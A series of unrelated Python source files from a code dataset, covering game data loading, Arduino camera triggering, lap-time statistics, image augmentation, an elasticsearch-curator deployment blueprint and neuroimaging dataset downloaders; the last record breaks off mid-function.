restarted'.format(\n namespace=namespace,\n container=name\n )\n else:\n ret['comment'] = '{namespace}.{container} was not restarted by kubelet within the given time'.format(\n namespace=namespace,\n container=name)\n\n return ret\n","sub_path":"salt/_states/caasp_cri.py","file_name":"caasp_cri.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481716209","text":"import json\nimport os\nfrom loader.Database import DBManager, DBTableMetadata\nfrom enum import Enum\nimport re\n\nclass CommandType(Enum):\n UNKNOWN = -1\n PARTS_MOTION = 2\n MOVEMENT = 5\n ROTATION = 7\n MARKER = 8\n BULLET = 9\n HIT = 10\n EFFECT = 11\n SOUND = 12\n CAMERA_MOTION = 13\n SEND_SIGNAL = 14\n ACTIVE_CANCEL = 15\n TARGETING = 17 # spin cancel ?\n ACTION_END = 23\n MULTI_BULLET = 24\n ANIMATION = 25 # or maybe effects ?\n CONTROL = 30 # some kinda control related thing\n COLLISION = 37 # seen in arrange bullet\n PARABOLA_BULLET = 41\n TIMESTOP = 48 # control animation playback ?\n TIMECURVE = 49 # control animation playback ?\n PIVOT_BULLET = 53\n MOVEMENT_IN_SKILL = 54 # only eze s1 uses this\n ROTATION_IN_SKILL = 55\n FIRE_STOCK_BULLET = 59\n CONDITION_TEXT = 63 # unsure where text is sourced, not in TextLabel\n SETTING_HIT = 66\n EFFECT_MM1 = 100 # megaman stuff\n EFFECT_MM2 = 101 # megaman stuff\n CHANGE_MODE = 108 # megaman stuff\n SHADER = 101\n ADD_HIT = 105\n ACTION_CONDITON = 111\n\n @classmethod\n def _missing_(cls, value):\n return cls.UNKNOWN\n\n\ndef build_db_data(meta, ref, seq, data):\n db_data = {}\n for k in meta.field_type.keys():\n if k in data:\n if isinstance(data[k], str):\n db_data[k] = data[k].strip()\n else:\n db_data[k] = data[k]\n else:\n db_data[k] = None\n db_data['_Id'] = f'{ref}{seq:03}'\n db_data['_ref'] = int(ref)\n db_data['_seq'] = seq\n return db_data\n\n\ndef build_bullet(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n ab_label = data['_arrangeBullet']['_abHitAttrLabel']\n if ab_label:\n db_data['_abHitAttrLabel'] = ab_label\n return db_data\n\n\ndef build_marker(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n charge_lvl_sec = db_data['_chargeLvSec']\n if not any(charge_lvl_sec):\n db_data['_chargeLvSec'] = None\n return db_data\n\ndef build_animation(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n if '_name' in data and data['_name']:\n db_data['_animationName'] = data['_name']\n return db_data\n\nACTION_PART = DBTableMetadata(\n 'ActionParts', pk='_Id', field_type={\n '_Id': DBTableMetadata.INT+DBTableMetadata.PK,\n '_ref': DBTableMetadata.INT,\n '_seq': DBTableMetadata.INT,\n '_seconds': DBTableMetadata.REAL,\n '_speed': DBTableMetadata.REAL,\n '_duration': DBTableMetadata.REAL,\n '_activateId': DBTableMetadata.INT,\n\n 'commandType': DBTableMetadata.INT,\n\n # PARTS_MOTION\n '_motionState': DBTableMetadata.TEXT,\n '_motionFrame': DBTableMetadata.INT,\n '_blendDuration': DBTableMetadata.REAL,\n '_isBlend': DBTableMetadata.INT,\n '_isEndSyncMotion': DBTableMetadata.INT,\n '_isIgnoreFinishCondition': DBTableMetadata.INT,\n '_isIdleAfterCancel': DBTableMetadata.INT,\n\n # MOVEMENT\n # '_position': DBTableMetadata.BLOB,\n # '_pushOut': DBTableMetadata.INT,\n # '_autoDash': DBTableMetadata.INT,\n # '_chargeMarker': DBTableMetadata.INT,\n # '_gravity': DBTableMetadata.REAL,\n # '_moveStyle': DBTableMetadata.INT,\n # '_teleportPosition': DBTableMetadata.INT,\n # '_teleportDirection': DBTableMetadata.INT,\n # '_distance': DBTableMetadata.INT,\n\n # ROTATION\n # '_rotation': DBTableMetadata.BLOB,\n\n # MARKER\n '_chargeSec': DBTableMetadata.REAL,\n '_chargeLvSec': DBTableMetadata.BLOB,\n # '_chargeAfterSec': DBTableMetadata.REAL,\n # '_ignoredByPlayerAI': DBTableMetadata.INT,\n # '_invisibleForPlayerAI': DBTableMetadata.INT,\n # '_playerAIEscapeDir': DBTableMetadata.INT,\n # '_ignoredImpactWaitForPlayerColor': DBTableMetadata.INT,\n\n # HIT/BULLET\n '_bulletSpeed': DBTableMetadata.REAL,\n '_delayTime': DBTableMetadata.REAL,\n '_collisionHitInterval': DBTableMetadata.REAL,\n '_isHitDelete': DBTableMetadata.INT,\n '_hitLabel': DBTableMetadata.TEXT,\n '_hitAttrLabel': DBTableMetadata.TEXT,\n '_abHitAttrLabel': DBTableMetadata.TEXT,\n '_bulletNum': DBTableMetadata.INT,\n '_generateNum': DBTableMetadata.INT,\n '_generateDelay': DBTableMetadata.REAL,\n '_lifetime': DBTableMetadata.REAL,\n\n # SEND_SIGNAL\n '_signalType': DBTableMetadata.INT,\n '_decoId': DBTableMetadata.INT,\n '_actionId': DBTableMetadata.INT,\n '_keepActionEnd': DBTableMetadata.INT,\n '_keepActionId1': DBTableMetadata.INT,\n '_keepActionId2': DBTableMetadata.INT,\n\n # ACTIVE_CANCEL\n '_actionType': DBTableMetadata.INT,\n '_motionEnd': DBTableMetadata.INT,\n\n # BULLETS - contains marker data, unsure if it does anything\n # '_useMarker': DBTableMetadata.INT,\n # '_marker': DBTableMetadata.BOLB (?)\n\n # ANIMATION\n '_animationName': DBTableMetadata.TEXT, \n '_isVisible': DBTableMetadata.INT, \n '_isActionClear': DBTableMetadata.INT,\n\n # ACTION_CONDITON\n '_actionConditionId': DBTableMetadata.INT,\n }\n)\n\nPROCESSORS = {}\nPROCESSORS[CommandType.PARTS_MOTION] = build_db_data\nPROCESSORS[CommandType.MARKER] = build_marker\nPROCESSORS[CommandType.BULLET] = build_bullet\nPROCESSORS[CommandType.HIT] = build_db_data\nPROCESSORS[CommandType.SEND_SIGNAL] = build_db_data\nPROCESSORS[CommandType.ACTIVE_CANCEL] = build_db_data\nPROCESSORS[CommandType.MULTI_BULLET] = build_bullet\nPROCESSORS[CommandType.ANIMATION] = build_animation\nPROCESSORS[CommandType.PARABOLA_BULLET] = build_bullet\nPROCESSORS[CommandType.PIVOT_BULLET] = build_bullet\nPROCESSORS[CommandType.FIRE_STOCK_BULLET] = build_bullet\nPROCESSORS[CommandType.SETTING_HIT] = build_db_data\nPROCESSORS[CommandType.ADD_HIT] = build_db_data\nPROCESSORS[CommandType.ACTION_CONDITON] = build_db_data\n\ndef load_actions(db, path):\n file_filter = re.compile(r'PlayerAction_([0-9]+)\\.json')\n db.drop_table(ACTION_PART.name)\n db.create_table(ACTION_PART)\n sorted_data = []\n for root, _, files in os.walk(path):\n for file_name in files:\n if file_name == 'ActionPartsList.json':\n table = 'ActionPartsList'\n db.drop_table(table)\n with open(os.path.join(root, file_name)) as f:\n raw = json.load(f)\n for r in raw:\n resource_fn = os.path.basename(r['_resourcePath'])\n try:\n r['_host'], r['_Id'] = resource_fn.split('_')\n r['_Id'] = int(r['_Id'])\n except:\n r['_host'], r['_Id'] = None, 0\n row = next(iter(raw))\n pk = '_resourcePath'\n meta = DBTableMetadata(table, pk=pk)\n meta.init_from_row(row)\n db.create_table(meta)\n db.insert_many(table, raw)\n else:\n res = file_filter.match(file_name)\n if res:\n ref = res.group(1)\n with open(os.path.join(root, file_name)) as f:\n raw = json.load(f)\n action = [gameObject['_data'] for gameObject in raw if '_data' in gameObject.keys()]\n for seq, data in enumerate(action):\n command_type = CommandType(data['commandType'])\n if command_type in PROCESSORS.keys():\n builder = PROCESSORS[command_type]\n db_data = builder(ACTION_PART, ref, seq, data)\n sorted_data.append(db_data)\n db.insert_many(ACTION_PART.name, sorted_data)\n\nif __name__ == '__main__':\n from loader.Database import DBManager\n db = DBManager()\n load_actions(db, './extract/actions')","sub_path":"loader/Actions.py","file_name":"Actions.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"445366000","text":"from PySide2.QtCore import QThread, Signal, Slot\nfrom devices.ardunio import Ardunio\nimport io\n#import RPi.GPIO as GPIO\n\nclass TriggerThread(QThread):\n trigger = Signal(bool)\n def __init__(self, port):\n QThread.__init__(self)\n print(\"Starting tread\")\n self.run_thread = True\n self.ardunio = Ardunio(port)\n\n #self._gpio_setup()\n \n\n def __del__(self):\n print(\"closing thread\") \n self.run_thread = False\n self.wait()\n\n def run(self): \n while self.run_thread == True:\n self.ardunio.wait_for_trigger()\n self.sleep(0.03)\n self.trigger_photo()\n\n\n def trigger_photo(self):\n self.ardunio.send(b'T')\n self.trigger.emit(True)\n self.ardunio.send(b'F')\n\n\n\n \"\"\"def _gpio_setup(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(23, GPIO.FALLING, callback=self.gpio_trigger_callback, bouncetime=300) \n\n \n def gpio_trigger_callback(self, channel):\n self.trigger_photo()\n\n\n def wait_for_gpio_pin(self):\n GPIO.wait_for_edge(23, GPIO.RISING) \"\"\"","sub_path":"trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369110326","text":"__author__ = 'Michiel Van den Berghe'\r\nimport statfunc\r\nimport time\r\n\r\nimport api\r\n\r\nclass History:\r\n warningDeviation = 0\r\n def __init__(self):\r\n self.lastUpdate = 0\r\n self.histories = {}\r\n\r\n def updateHistory(self, timestamp, data):\r\n self.lastUpdate = timestamp\r\n for stick, history in data.items():\r\n if stick not in self.histories:\r\n self.histories[stick] = StickHistory(stick)\r\n self.histories[stick].updateHistory(timestamp, history)\r\n\r\n def getWarnings(self):\r\n warnings = {}\r\n for stick, history in self.histories.items():\r\n dev, expected, stddev, lastLap = history.getDeviation()\r\n if dev > self.warningDeviation:\r\n warnings[stick] = (dev, expected, stddev, lastLap)\r\n return warnings\r\n\r\n def lastUpdated(self):\r\n return self.lastUpdate\r\n\r\nclass StickHistory:\r\n historySize = 10\r\n def __init__(self, stick):\r\n self.stick = stick\r\n self.history = []\r\n self.lastUpdate = 0\r\n\r\n def updateHistory(self, timestamp, laps):\r\n self.lastUpdate = timestamp\r\n self.history.extend(laps)\r\n self.history = self.history[-self.historySize:]\r\n\r\n def getLastLap(self):\r\n return self.history[-1]\r\n\r\n def getLapTimes(self):\r\n return statfunc.diff(self.history)\r\n\r\n def getDeviation(self):\r\n laptimes = self.getLapTimes()\r\n stdev = statfunc.stdev(laptimes)\r\n avgLap = statfunc.avg(laptimes)\r\n lastLap = self.getLastLap()\r\n # deviation, expected, stddev, lastLap\r\n return (self.lastUpdate - lastLap - avgLap) / stdev, lastLap + avgLap, stdev, lastLap\r\n\r\n\r\nclass HistoryUpdater:\r\n def __init__(self, history, fetcher, interval):\r\n self.history = history\r\n self.fetcher = fetcher\r\n self.interval = interval\r\n self.running = True\r\n\r\n def start(self):\r\n print(\"Statchecker running...\")\r\n while self.running:\r\n print(\"Updating %s...\" % time.ctime())\r\n timestamp, data = self.fetcher.getHistory(self.history.lastUpdated())\r\n time.sleep(self.interval)\r\n self.history.updateHistory(timestamp, data)\r\n for team, info in self.history.getWarnings().items():\r\n dev, expected, stddev, lastLap = info\r\n print(\"Warning: %s is %f standaardafwijkingen (%f) te laat. Laatste lap: %s\" % (team, dev, stddev, time.ctime(lastLap)))\r\n print(\"Updated %s\" % time.ctime(timestamp))\r\n\r\n def stop(self):\r\n self.running = False\r\n\r\n\r\nif __name__ == '__main__':\r\n updater = HistoryUpdater(History(), api.HistoryFetcher(api.url), 10)\r\n updater.start()","sub_path":"tools/data-analysis/laps.py","file_name":"laps.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"187708585","text":"# File for useful functions in the context of lane recognition\n\nimport cv2 as cv\nimport os\n\n\ndef show_image(img_path):\n \"\"\"\n\n :param img_path: Image's absolute path: /.../image.png\n :return: Window showing the requested image. Press any key to close it\n \"\"\"\n\n img = cv.imread(filename=img_path)\n\n show_image_temp(img=img)\n\n\ndef show_image_temp(img):\n \"\"\"\n\n :param img:\n :return:\n \"\"\"\n # Create a visualization window\n # CV_WINDOW_AUTOSIZE : window size will depend on image size\n cv.namedWindow(\"Display window\", cv.WINDOW_AUTOSIZE)\n\n # Show the image\n cv.imshow(\"Display window\", img)\n\n # Wait\n cv.waitKey(0)\n\n # Destroy the window -- might be omitted\n cv.destroyWindow(\"Display window\")\n\n\ndef get_abs_path(rel_path: str, is_dir: bool = False):\n \"\"\"\n\n :param rel_path: relative path\n :param is_dir:\n :return:\n \"\"\"\n\n path = os.path.realpath(rel_path)\n\n assert os.path.exists(path), \"File does not exist in specified path!\"\n assert not is_dir or os.path.isdir(path), \"Expected directory, got file\"\n\n return path\n\n\nif __name__ == '__main__':\n # Testing, maybe...\n ...\n","sub_path":"Lane_Recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"271791346","text":"import numpy as np\nimport tensorflow\n\n\nclass Copyout:\n \"\"\"\n Copyout class for image augmentation.\n\n Attributes\n ----------\n extend : int\n Extend of the quare patch. Must be > 0.\n image_buffer_size : int\n Buffer size where images are stores. Must be > 0, default is 128.\n \"\"\"\n\n def __init__(self, extent, image_buffer_size=128):\n if not extent > 0:\n raise ValueError('\"extend\" must be > 0')\n\n if not image_buffer_size > 0:\n raise ValueError('\"image_buffer_size\" must be > 0')\n\n self._extent = extent\n self._image_buffer_size = image_buffer_size\n self._image_buffer = []\n\n def __call__(self, img):\n \"\"\"\n Augment a given image with Copyout.\n\n Attributes\n ----------\n img : numpy tensor with rank 3\n the image\n\n Returns\n -------\n numpy tensor with rank 3\n the augmented image\n \"\"\"\n h, w, _ = img.shape\n\n x = np.random.randint(w)\n y = np.random.randint(h)\n\n x1 = np.clip(x - self._extent // 2, 0, w)\n x2 = np.clip(x + self._extent // 2, 0, w)\n y1 = np.clip(y - self._extent // 2, 0, h)\n y2 = np.clip(y + self._extent // 2, 0, h)\n\n copyout_y_size = y2 - y1\n copyout_x_size = x2 - x1\n copyout_y = np.random.randint(h - copyout_y_size)\n copyout_x = np.random.randint(w - copyout_x_size)\n\n image_buffer_len = len(self._image_buffer)\n img_copy = np.copy(img)\n\n # only augment when we have images in the buffer\n # first image will not be augmented\n if image_buffer_len > 0:\n image_buffer_index = np.random.randint(image_buffer_len)\n\n # buffer is full\n if image_buffer_len >= self._image_buffer_size:\n old_img = self._image_buffer.pop(image_buffer_index)\n\n # buffer still needs to be filled\n else:\n old_img = self._image_buffer[image_buffer_index]\n\n # do the copying\n img[y1: y2, x1: x2, :] = old_img[copyout_y: copyout_y + copyout_y_size,\n copyout_x: copyout_x + copyout_x_size,\n :]\n\n # append source image to buffer\n self._image_buffer.append(img_copy)\n\n return img\n\n\n# TODO maybe add SamplePairing and Cutout implementations later\n\n\nclass CopyPairing(tensorflow.keras.callbacks.Callback):\n\n def __init__(self, extent,\n warmup_epochs, fine_tuning_epoch,\n coo_epochs=1, cop_epochs=1,\n image_buffer_size=128):\n super().__init__()\n\n if not extent > 0:\n raise ValueError('\"extend\" must be > 0')\n\n if not warmup_epochs >= 0:\n raise ValueError('\"warmup_epochs\" must be >= 0')\n\n if not fine_tuning_epoch > 0:\n raise ValueError('\"fine_tuning_epoch\" must be > 0')\n\n # TODO maybe check if warmup_epochs < fine_tuning_epoch or something\n\n if not coo_epochs > 0:\n raise ValueError('\"coo_epochs\" must be > 0')\n\n if not cop_epochs > 0:\n raise ValueError('\"cop_epochs\" must be > 0')\n\n if not image_buffer_size > 0:\n raise ValueError('\"image_buffer_size\" must be > 0')\n\n self._extent = extent\n self._warmup_epochs = warmup_epochs\n self._fine_tuning_epoch = fine_tuning_epoch\n self._coo_epochs = coo_epochs\n self._cop_epochs = cop_epochs\n self._image_buffer_size = image_buffer_size\n\n self._image_buffer = []\n self._coo_count = 0\n self._cop_count = 0\n self._current_epoch = 0\n\n def copyout(self, img, old_img):\n h, w, _ = img.shape\n\n x = np.random.randint(w)\n y = np.random.randint(h)\n\n x1 = np.clip(x - self._extent // 2, 0, w)\n x2 = np.clip(x + self._extent // 2, 0, w)\n y1 = np.clip(y - self._extent // 2, 0, h)\n y2 = np.clip(y + self._extent // 2, 0, h)\n\n copyout_y_size = y2 - y1\n copyout_x_size = x2 - x1\n copyout_y = np.random.randint(h - copyout_y_size)\n copyout_x = np.random.randint(w - copyout_x_size)\n\n # do the copying\n img[y1: y2, x1: x2, :] = old_img[copyout_y: copyout_y + copyout_y_size,\n copyout_x: copyout_x + copyout_x_size,\n :]\n\n return img\n\n def __call__(self, img):\n image_buffer_len = len(self._image_buffer)\n img_copy = np.copy(img)\n\n # only augment when we have images in the buffer\n # first image will not be augmented\n if image_buffer_len > 0:\n image_buffer_index = np.random.randint(image_buffer_len)\n if image_buffer_len >= self._image_buffer_size:\n old_img = self._image_buffer.pop(image_buffer_index)\n else:\n old_img = self._image_buffer[image_buffer_index]\n if self._current_epoch < self._warmup_epochs:\n # Copyout\n img = self.copyout(img, old_img)\n elif self._current_epoch > self._fine_tuning_epoch - 2:\n # Copyout\n img = self.copyout(img, old_img)\n else:\n if self._coo_count <= self._coo_epochs - 1:\n # Copyout\n img = self.copyout(img, old_img)\n self._coo_count += 1\n elif self._cop_count <= self._cop_epochs - 1:\n # SamplePairing\n img = np.mean(np.array([img, old_img]), axis=0)\n\n self._cop_count += 1\n if self._cop_count > self._cop_epochs - 1:\n self._coo_count = 0\n self._cop_count = 0\n\n self._image_buffer.append(img_copy)\n\n return img\n\n # TODO test if *args is ok\n def on_epoch_begin(self, epoch, *args):\n self._current_epoch = epoch\n","sub_path":"coocop/coocop.py","file_name":"coocop.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"297927383","text":"\"\"\"\nCurator Blueprint\n=======================\n\n**Fabric environment:**\n\n.. code-block:: yaml\n\n blueprints:\n - blues.curator\n\n settings:\n curator:\n # branch: 5 # Major Version of curator (default: 5)\n # version: latest # Speciifc version of curator to install\n\n timeout: 60 # Default action timeout\n\n es_hosts: # ES Server(s) (Default: localhost)\n - localhost\n\n actions:\n delete:\n some-index: 7 # index_prefix: days_to_keep\n\n\"\"\"\nimport yaml\n\nfrom fabric.decorators import task\n\nfrom refabric.api import info\nfrom refabric.context_managers import sudo\nfrom refabric.contrib import blueprints\n\nfrom . import debian\n\n__all__ = ['setup', 'configure']\n\n\nblueprint = blueprints.get(__name__)\n\n\n@task\ndef setup():\n \"\"\"\n Install Elasticsearch\n \"\"\"\n install()\n configure()\n\n\ndef install():\n with sudo():\n branch = blueprint.get('branch', '5')\n info('Adding apt repository for {} branch {}', 'curator', branch)\n\n repository = 'https://packages.elastic.co/curator/{}/debian stable main'.format(branch)\n debian.add_apt_repository(repository)\n\n info('Adding apt key for', repository)\n debian.add_apt_key('https://packages.elastic.co/GPG-KEY-elasticsearch')\n debian.apt_get_update()\n\n version = blueprint.get('version', 'latest')\n info('Installing {} version {}', 'elasticsearch-curator', version)\n package = 'elasticsearch-curator' + ('={}'.format(version) if version != 'latest' else '')\n debian.apt_get('install', package)\n\n\ndef yaml_boolean(input):\n return str(input).lower()\n\n\n@task\ndef configure():\n \"\"\"\n Configure Elasticsearch\n \"\"\"\n\n actions = [\n {\n 'action': 'delete_indices',\n 'prefix': prefix,\n 'days_gt': days_gt\n }\n for prefix, days_gt\n in blueprint.get('actions.delete', {}).iteritems()\n ]\n\n context = {\n 'es_hosts': yaml.dump(blueprint.get('es_hosts', []) or ['localhost']),\n 'timoeut': blueprint.get('timoeut', 60),\n 'actions': actions\n }\n\n debian.mkdir(\"/etc/curator/\", owner='elasticsearch')\n blueprint.upload('./', \"/etc/curator/\", context=context, user='elasticsearch')\n","sub_path":"blues/curator.py","file_name":"curator.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"56752924","text":"#!/usr/bin/python3\n\nprint(\"Welcome to our first python program! Coded from terminal.\")\nuser_response = input(\"Do you want to proceed?[Y/n]\")\n\nif user_response == \"Y\":\n\tuser_name = input(\"Enter username: \")\n\tuser_course = input(\"Enter course name: \")\n\tprint(\"Welcome \" + user_name + \" to the \" + user_course + \".\")\nelse:\n\tprint(\"Thanks for using this program, good bye!\") \n","sub_path":"userInput.py","file_name":"userInput.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"283670201","text":"n = int(input())\ncol = 2*n-1\nrow = n\nidx = n-1\nboard = [[0]*col for _ in range(row)]\nfor i in range(col):\n cnt = 2*i + 1\n for j in range(idx,idx+cnt):\n board[i][j] = 1\n idx-=1\n if idx<0:break\nfor i in range(row):\n Blank = False\n for j in range(col):\n if board[i][j]==0 and not Blank:print(' ',end='')\n elif board[i][j] == 1:\n Blank = True\n print('*',end='')\n elif board[i][j]==0 and Blank:\n print()\n break\n","sub_path":"파이썬연습/별찍기.py","file_name":"별찍기.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241444952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nData grabbers\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nfrom pathlib import Path\nfrom ..data.utils import _get_dataset_dir, _fetch_file\n\n\nOSF_PROJECT_URL = ('https://files.osf.io/v1/resources/fvuh8/providers/osfstorage/')\nOSF_RESOURCES = {\n 'MNI152NLin2009cAsym': ('5b0dbce20f461a000db8fa3d', '5d386d7db9c1dec30230623db25e05e1'),\n 'OASIS30ANTs': ('5b0dbce34c28ef0012c7f788', 'f625a0390eb32a7852c7b0d71ac428cd'),\n 'brainweb': ('57f32b96b83f6901f194c3ca', '384263fbeadc8e2cca92ced98f224c4b'),\n 'ds003_downsampled': ('57f328f6b83f6901ef94cf70', '5a558961c1eb5e5f162696d8afa956e8'),\n 'mni_template': ('57f32ab29ad5a101fb77fd89', 'debfa882b8c301cd6d75dd769e73f727'),\n 'mni_template_RAS': ('57f32a799ad5a101f977eb77', 'a4669f0e7acceae148bb39450b2b21b4'),\n 'ants_oasis_template': ('57f32ae89ad5a101f977eb79', '34d39070b541c416333cc8b6c2fe993c'),\n 'ants_oasis_template_ras': ('584123a29ad5a1020913609d', 'afa21f99c66ae1672320d8aa0408229a'),\n 'ants_nki_template_ras': ('59cd90f46c613b02b3d79782', 'e5debaee65b8f2c8971577db1327e314'),\n 'mni_epi': ('57fa09cdb83f6901d93623a0', '9df727e1f742ec55213480434b4c4811'),\n 'mni152_nlin_sym_las': ('57fa7fc89ad5a101e635eeef', '9c4c0cad2a2e99d6799f01abf4107f5a'),\n 'mni152_nlin_sym_ras': ('57fa7fd09ad5a101df35eed0', '65d64ad5a980da86e7d07d95b3ed2ccb'),\n 'mni_icbm152_linear': ('580705eb594d9001ed622649', '72be639e92532def7caad75cb4058e83'),\n 'mni_icbm152_nlin_asym_09c': ('580705089ad5a101f17944a9', '002f9bf24dc5c32de50c03f01fa539ec'),\n 'tpl-OASISTRT20': ('5b16f17aeca4a80012bd7542', '1b5389bc3a895b2bd5c0d47401107176'),\n 'tpl-hcpLR32k': ('5b198ec6b796ba000f3e4858', '0ba9adcaa42fa88616a4cea5a1ce0c5a'),\n 'tpl-conte69': ('5b198ec5ec24e20011b48548', 'bd944e3f9f343e0e51e562b440960529'),\n}\n\nBIDS_EXAMPLES = {\n 'BIDS-examples-1-1.0.0-rc3u5': (\n 'https://github.com/chrisfilo/BIDS-examples-1/archive/1.0.0-rc3u5.tar.gz',\n '035fe54445c56eff5bd845ef3795fd56'),\n 'BIDS-examples-1-enh-ds054': (\n 'http://github.com/chrisfilo/BIDS-examples-1/archive/enh/ds054.zip',\n '56cee272860624924bc23efbe868acb7'),\n}\n\n# Map names of templates to OSF_RESOURCES keys\nTEMPLATE_MAP = {\n 'MNI152NLin2009cAsym': 'MNI152NLin2009cAsym',\n 'OASIS': 'OASIS30ANTs',\n 'NKI': 'ants_nki_template_ras',\n}\n\n\ndef get_dataset(dataset_name, data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the BIDS-fied brainweb 1mm normal\n\n\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n\n \"\"\"\n data_dir = _get_dataset_dir(dataset_name, data_dir=data_dir, verbose=verbose)\n\n if dataset_name in TEMPLATE_MAP:\n dataset_name = TEMPLATE_MAP.get(dataset_name, dataset_name)\n data_dir = str(Path(data_dir).parent / (\n 'tpl-%s' % dataset_name))\n\n file_id, md5 = OSF_RESOURCES[dataset_name]\n if url is None:\n url = '{}/{}'.format(OSF_PROJECT_URL, file_id)\n\n if _fetch_file(url, data_dir, filetype='tar', resume=resume, verbose=verbose,\n md5sum=md5):\n return data_dir\n else:\n return None\n\n\ndef get_brainweb_1mm_normal(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the BIDS-fied brainweb 1mm normal\n\n\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n\n \"\"\"\n return get_dataset('brainweb', data_dir, url, resume, verbose)\n\n\ndef get_ds003_downsampled(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the BIDS-fied ds003_downsampled\n\n\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n\n \"\"\"\n return get_dataset('ds003_downsampled', data_dir, url, resume, verbose)\n\n\ndef get_mni_template(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n\n\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n\n \"\"\"\n return get_dataset('mni_template', data_dir, url, resume, verbose)\n\n\ndef get_mni_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_template_RAS', data_dir, url, resume, verbose)\n\n\ndef get_mni_epi(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_epi', data_dir, url, resume, verbose)\n\n\ndef get_ants_oasis_template(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the OASIS dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_oasis_template', data_dir, url, resume, verbose)\n\n\ndef get_ants_oasis_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the OASIS dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_oasis_template_ras', data_dir, url, resume, verbose)\n\n\ndef get_ants_nki_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the NKI dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_nki_template_ras', data_dir, url, resume, verbose)\n\n\ndef get_mni152_nlin_sym_las(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni152_nlin_sym_las', data_dir, url, resume, verbose)\n\n\ndef get_mni152_nlin_sym_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni152_nlin_sym_ras', data_dir, url, resume, verbose)\n\n\ndef get_mni_icbm152_nlin_asym_09c(data_dir=None, url=None, resume=True, verbose=1):\n return get_dataset('mni_icbm152_nlin_asym_09c', data_dir, url, resume, verbose)\n\n\ndef get_mni_icbm152_linear(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_icbm152_linear', data_dir, url, resume, verbose)\n\n\ndef get_bids_examples(data_dir=None, url=None, resume=True, verbose=1, variant=None):\n \"\"\"\n Download BIDS-examples-1\n \"\"\"\n\n if variant is None or variant not in BIDS_EXAMPLES:\n variant = 'BIDS-examples-1-1.0.0-rc3u5'\n\n if url is None:\n url = BIDS_EXAMPLES[variant][0]\n md5 = 